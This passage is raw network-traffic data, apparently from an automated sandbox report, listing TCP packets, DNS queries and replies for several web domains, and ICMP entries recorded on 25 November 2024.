                                                    Nov 25, 2024 19:44:58.955554008 CET4434983513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.122170925 CET4434983813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.122915030 CET49838443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.122942924 CET4434983813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.123267889 CET49838443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.123272896 CET4434983813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.127978086 CET4434983713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.128582954 CET49837443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.128609896 CET4434983713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.128882885 CET49837443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.128887892 CET4434983713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.143685102 CET4434983413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.143755913 CET4434983413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.143981934 CET49834443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.144033909 CET49834443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.144053936 CET4434983413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.144067049 CET49834443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.144072056 CET4434983413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.147325993 CET49839443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.147360086 CET4434983913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.147454977 CET49839443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.147629023 CET49839443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.147640944 CET4434983913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.185790062 CET4434983613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.186173916 CET49836443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.186183929 CET4434983613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.186573982 CET49836443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.186578035 CET4434983613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.422187090 CET4434983513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.422365904 CET4434983513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.422658920 CET49835443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.422658920 CET49835443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.422658920 CET49835443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.425507069 CET49840443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.425546885 CET4434984013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.425623894 CET49840443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.425765991 CET49840443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.425782919 CET4434984013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.581471920 CET4434983813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.581536055 CET4434983813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.581624031 CET49838443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.581876993 CET49838443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.581892967 CET4434983813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.581903934 CET49838443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.581909895 CET4434983813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.585032940 CET49841443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.585063934 CET4434984113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.585160017 CET49841443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.585380077 CET49841443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.585391045 CET4434984113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.591793060 CET4434983713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.591856003 CET4434983713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.591912985 CET49837443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.592096090 CET49837443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.592122078 CET4434983713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.592134953 CET49837443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.592139006 CET4434983713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.594460964 CET49842443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.594501972 CET4434984213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.594582081 CET49842443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.594777107 CET49842443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.594793081 CET4434984213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.650055885 CET4434983613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.650127888 CET4434983613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.650186062 CET49836443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.650372028 CET49836443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.650381088 CET4434983613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.650389910 CET49836443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.650393009 CET4434983613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.653201103 CET49843443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.653217077 CET4434984313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.653301954 CET49843443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.657080889 CET49843443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.657092094 CET4434984313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:59.730360031 CET49835443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:59.730386972 CET4434983513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:00.644016027 CET44349815142.250.181.68192.168.2.4
                                                    Nov 25, 2024 19:45:00.644098043 CET44349815142.250.181.68192.168.2.4
                                                    Nov 25, 2024 19:45:00.644134998 CET49815443192.168.2.4142.250.181.68
                                                    Nov 25, 2024 19:45:00.946682930 CET4434983913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:00.947241068 CET49839443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:00.947272062 CET4434983913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:00.947889090 CET49839443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:00.947897911 CET4434983913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.214662075 CET4434984013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.219957113 CET49840443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.219988108 CET4434984013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.220629930 CET49840443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.220634937 CET4434984013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.392079115 CET4434983913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.392164946 CET4434983913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.392213106 CET49839443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.392422915 CET49839443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.392442942 CET4434983913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.392453909 CET49839443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.392460108 CET4434983913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.408143997 CET49844443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.408178091 CET4434984413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.408241034 CET49844443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.408561945 CET49844443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.408581018 CET4434984413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.427813053 CET4434984213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.428174973 CET49842443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.428205013 CET4434984213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.428668976 CET49842443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.428675890 CET4434984213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.435770988 CET4434984113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.436150074 CET49841443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.436182976 CET4434984113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.436682940 CET49841443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.436688900 CET4434984113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.453094006 CET4434984313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.453391075 CET49843443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.453421116 CET4434984313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.453891039 CET49843443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.453902006 CET4434984313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.544949055 CET49815443192.168.2.4142.250.181.68
                                                    Nov 25, 2024 19:45:01.544970036 CET44349815142.250.181.68192.168.2.4
                                                    Nov 25, 2024 19:45:01.666193962 CET4434984013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.666368008 CET4434984013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.666667938 CET49840443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.666668892 CET49840443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.666668892 CET49840443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.669773102 CET49845443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.669814110 CET4434984513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.669914007 CET49845443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.670089960 CET49845443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.670103073 CET4434984513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.897382975 CET4434984213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.897574902 CET4434984213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.897762060 CET49842443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.897934914 CET49842443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.897934914 CET49842443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.897962093 CET4434984213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.897979975 CET4434984213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.900998116 CET49846443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.901046038 CET4434984613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.901119947 CET49846443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.901248932 CET49846443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.901262045 CET4434984613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.905661106 CET4434984313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.905826092 CET4434984313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.905886889 CET49843443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.905946016 CET49843443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.905946016 CET49843443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.905970097 CET4434984313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.905982018 CET4434984313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.907491922 CET4434984113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.907553911 CET4434984113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.907603979 CET49841443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.907754898 CET49841443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.907763004 CET4434984113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.907790899 CET49841443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.907798052 CET4434984113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.908943892 CET49847443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.908967018 CET4434984713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.909110069 CET49847443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.909290075 CET49847443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.909298897 CET4434984713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.909631968 CET49848443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.909687042 CET4434984813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.909750938 CET49848443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.909859896 CET49848443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.909878016 CET4434984813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:45:01.980345011 CET49840443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:45:01.980400085 CET4434984013.107.246.63192.168.2.4
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 25, 2024 19:43:45.337951899 CET53592661.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:43:45.343986988 CET53603631.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:43:46.502929926 CET5443653192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:43:46.503058910 CET5475553192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:43:46.728472948 CET53544361.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:43:46.792769909 CET53547551.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:43:48.173717976 CET53519511.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:43:48.610728979 CET5143153192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:43:48.611116886 CET6310853192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:43:48.874335051 CET53514311.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:43:48.874372959 CET53631081.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:43:49.127012968 CET5520453192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:43:49.127320051 CET6399653192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:43:49.264691114 CET53552041.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:43:49.264733076 CET53639961.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:43:51.470230103 CET5603453192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:43:51.470436096 CET5268953192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:43:51.502603054 CET5708153192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:43:51.502782106 CET6052853192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:43:51.607990026 CET53560341.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:43:51.608939886 CET53526891.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:43:51.642168045 CET53570811.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:43:51.647347927 CET53605281.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:43:53.860295057 CET5283653192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:43:53.860670090 CET6205553192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:43:53.885181904 CET5500553192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:43:53.885330915 CET5490653192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:43:54.008270025 CET53528361.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:43:54.008308887 CET53620551.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:43:54.031204939 CET53550051.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:43:54.031232119 CET53549061.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:05.284218073 CET53520061.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:05.963185072 CET138138192.168.2.4192.168.2.255
                                                    Nov 25, 2024 19:44:23.360778093 CET5275253192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:23.360910892 CET6313153192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:23.712100029 CET53527521.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:23.722935915 CET53631311.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:24.317023993 CET53574601.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:25.555887938 CET5166153192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:25.556216955 CET6131053192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:25.556871891 CET6363953192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:25.557215929 CET5483853192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:25.707885981 CET53516611.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:25.707918882 CET53636391.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:25.708838940 CET53548381.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:25.709331989 CET53613101.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:27.783612013 CET5372753192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:27.783760071 CET5142653192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:27.884591103 CET5511953192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:27.884748936 CET5005653192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:27.924913883 CET53537271.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:27.938088894 CET53514261.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:28.235275030 CET53500561.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:28.235358953 CET53551191.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:32.014883041 CET5538553192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:32.015017033 CET5582553192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:32.207089901 CET53558251.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:32.207237005 CET53553851.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:34.411611080 CET5912353192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:34.411757946 CET5915553192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:34.426290035 CET5492353192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:34.426577091 CET5748953192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:34.602785110 CET53591551.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:34.602849960 CET53543041.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:34.602977991 CET53549231.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:34.603359938 CET53574891.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:34.603471994 CET53591231.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:38.490135908 CET5808353192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:38.490362883 CET5542353192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:38.635586977 CET53580831.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:38.638242006 CET53554231.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:45.020278931 CET53580031.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:47.162431002 CET53644721.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:48.621762991 CET6105053192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:48.621927977 CET6213653192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:48.622225046 CET6039853192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:48.622359991 CET5055653192.168.2.41.1.1.1
                                                    Nov 25, 2024 19:44:48.772583961 CET53610501.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:48.929665089 CET53505561.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:48.929738045 CET53603981.1.1.1192.168.2.4
                                                    Nov 25, 2024 19:44:48.929748058 CET53621361.1.1.1192.168.2.4
                                                    TimestampSource IPDest IPChecksumCodeType
                                                    Nov 25, 2024 19:43:46.792836905 CET192.168.2.41.1.1.1c279(Port unreachable)Destination Unreachable
                                                    Nov 25, 2024 19:44:48.929883003 CET192.168.2.41.1.1.1c21d(Port unreachable)Destination Unreachable
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Nov 25, 2024 19:43:46.502929926 CET192.168.2.41.1.1.10xad8bStandard query (0)yancesybros.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:46.503058910 CET192.168.2.41.1.1.10xa754Standard query (0)yancesybros.com65IN (0x0001)false
                                                    Nov 25, 2024 19:43:48.610728979 CET192.168.2.41.1.1.10xb0beStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:48.611116886 CET192.168.2.41.1.1.10xfcfaStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                    Nov 25, 2024 19:43:49.127012968 CET192.168.2.41.1.1.10xa0b1Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:49.127320051 CET192.168.2.41.1.1.10x2cd9Standard query (0)www.google.com65IN (0x0001)false
                                                    Nov 25, 2024 19:43:51.470230103 CET192.168.2.41.1.1.10x9c9eStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:51.470436096 CET192.168.2.41.1.1.10xb319Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                    Nov 25, 2024 19:43:51.502603054 CET192.168.2.41.1.1.10x7a08Standard query (0)yancesybros.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:51.502782106 CET192.168.2.41.1.1.10x5fd9Standard query (0)yancesybros.com65IN (0x0001)false
                                                    Nov 25, 2024 19:43:53.860295057 CET192.168.2.41.1.1.10x839bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:53.860670090 CET192.168.2.41.1.1.10xc6f4Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                    Nov 25, 2024 19:43:53.885181904 CET192.168.2.41.1.1.10xbc69Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:53.885330915 CET192.168.2.41.1.1.10xe4d5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                    Nov 25, 2024 19:44:23.360778093 CET192.168.2.41.1.1.10x4504Standard query (0)choicesff.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:23.360910892 CET192.168.2.41.1.1.10xa955Standard query (0)choicesff.com65IN (0x0001)false
                                                    Nov 25, 2024 19:44:25.555887938 CET192.168.2.41.1.1.10x2ff8Standard query (0)choicesff.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:25.556216955 CET192.168.2.41.1.1.10x5be2Standard query (0)choicesff.com65IN (0x0001)false
                                                    Nov 25, 2024 19:44:25.556871891 CET192.168.2.41.1.1.10x6329Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:25.557215929 CET192.168.2.41.1.1.10x41dcStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                    Nov 25, 2024 19:44:27.783612013 CET192.168.2.41.1.1.10x2c51Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:27.783760071 CET192.168.2.41.1.1.10xab00Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                    Nov 25, 2024 19:44:27.884591103 CET192.168.2.41.1.1.10x5cf2Standard query (0)nl.nsiciumbe.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:27.884748936 CET192.168.2.41.1.1.10x5879Standard query (0)nl.nsiciumbe.com65IN (0x0001)false
                                                    Nov 25, 2024 19:44:32.014883041 CET192.168.2.41.1.1.10xacadStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:32.015017033 CET192.168.2.41.1.1.10x5ff9Standard query (0)code.jquery.com65IN (0x0001)false
                                                    Nov 25, 2024 19:44:34.411611080 CET192.168.2.41.1.1.10x6399Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:34.411757946 CET192.168.2.41.1.1.10x2dc1Standard query (0)code.jquery.com65IN (0x0001)false
                                                    Nov 25, 2024 19:44:34.426290035 CET192.168.2.41.1.1.10x94beStandard query (0)blogger.googleusercontent.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:34.426577091 CET192.168.2.41.1.1.10xf4e6Standard query (0)blogger.googleusercontent.com65IN (0x0001)false
                                                    Nov 25, 2024 19:44:38.490135908 CET192.168.2.41.1.1.10x60a7Standard query (0)blogger.googleusercontent.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:38.490362883 CET192.168.2.41.1.1.10xd357Standard query (0)blogger.googleusercontent.com65IN (0x0001)false
                                                    Nov 25, 2024 19:44:48.621762991 CET192.168.2.41.1.1.10xe30fStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:48.621927977 CET192.168.2.41.1.1.10xae58Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                    Nov 25, 2024 19:44:48.622225046 CET192.168.2.41.1.1.10x400Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:48.622359991 CET192.168.2.41.1.1.10x2a9dStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Nov 25, 2024 19:43:46.728472948 CET1.1.1.1192.168.2.40xad8bNo error (0)yancesybros.com172.67.189.74A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:46.728472948 CET1.1.1.1192.168.2.40xad8bNo error (0)yancesybros.com104.21.89.132A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:46.792769909 CET1.1.1.1192.168.2.40xa754No error (0)yancesybros.com65IN (0x0001)false
                                                    Nov 25, 2024 19:43:48.874335051 CET1.1.1.1192.168.2.40xb0beNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:49.264691114 CET1.1.1.1192.168.2.40xa0b1No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:49.264733076 CET1.1.1.1192.168.2.40x2cd9No error (0)www.google.com65IN (0x0001)false
                                                    Nov 25, 2024 19:43:51.607990026 CET1.1.1.1192.168.2.40x9c9eNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:51.607990026 CET1.1.1.1192.168.2.40x9c9eNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:51.608939886 CET1.1.1.1192.168.2.40xb319No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                    Nov 25, 2024 19:43:51.642168045 CET1.1.1.1192.168.2.40x7a08No error (0)yancesybros.com172.67.189.74A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:51.642168045 CET1.1.1.1192.168.2.40x7a08No error (0)yancesybros.com104.21.89.132A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:51.647347927 CET1.1.1.1192.168.2.40x5fd9No error (0)yancesybros.com65IN (0x0001)false
                                                    Nov 25, 2024 19:43:54.008270025 CET1.1.1.1192.168.2.40x839bNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:54.008270025 CET1.1.1.1192.168.2.40x839bNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:54.008308887 CET1.1.1.1192.168.2.40xc6f4No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                    Nov 25, 2024 19:43:54.031204939 CET1.1.1.1192.168.2.40xbc69No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:43:54.031204939 CET1.1.1.1192.168.2.40xbc69No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
